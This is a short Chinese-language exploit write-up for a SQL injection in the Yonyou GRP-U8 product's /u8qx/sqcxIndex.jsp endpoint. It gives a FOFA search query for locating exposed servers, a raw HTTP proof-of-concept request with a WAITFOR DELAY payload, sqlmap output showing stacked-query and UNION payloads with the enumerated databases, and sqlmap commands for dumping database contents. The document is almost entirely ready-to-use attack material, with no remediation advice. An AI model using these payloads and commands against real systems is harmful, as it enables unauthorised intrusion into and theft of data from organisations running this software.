fofa语法:
app="用友-GRP-U8"
漏洞点
/u8qx/sqcxIndex.jsp?key=1
POC
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:10'-- HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=5AB71B604B4836522AE5497D7364DA6A
Connection: close
sql语法:
WAITFOR DELAY '0:0:6'
指定 SQL Server 等待 6 秒钟
- 第一个数字
0
表示小时。 - 第二个数字
0
表示分钟。 - 第三个数字
6
表示秒
使用SqlMap进行测试
sqlmap使用:【SQL注入工具】SQLMap参数详解_sqlmap参数-t-CSDN博客
获取数据库名
sqlmap.py -u host --batch --dbs
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: key (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: key=1');WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: key=1') UNION ALL SELECT NULL,CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(72)+CHAR(73)+CHAR(122)+CHAR(101)+CHAR(87)+CHAR(76)+CHAR(119)+CHAR(122)+CHAR(71)+CHAR(70)+CHAR(103)+CHAR(76)+CHAR(117)+CHAR(75)+CHAR(119)+CHAR(103)+CHAR(68)+CHAR(85)+CHAR(107)+CHAR(105)+CHAR(90)+CHAR(84)+CHAR(115)+CHAR(117)+CHAR(116)+CHAR(89)+CHAR(113)+CHAR(108)+CHAR(100)+CHAR(117)+CHAR(122)+CHAR(79)+CHAR(72)+CHAR(84)+CHAR(100)+CHAR(97)+CHAR(86)+CHAR(71)+CHAR(81)+CHAR(81)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(107)+CHAR(113)-- prXP
---
available databases [8]:
[*] anyisys
[*] GZMH
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
获取指定数据库数据[测试采用时间盲注,用时较长]
sqlmap.py -u host -D tempdb --batch –time-sec=10 --dump --output-dir=
-time-sec:指定延时
--output-dir= 指定保存路径
--batch 默认yes
-D 指定数据库
-T 指定表
-C 指定列
--dump 获取数据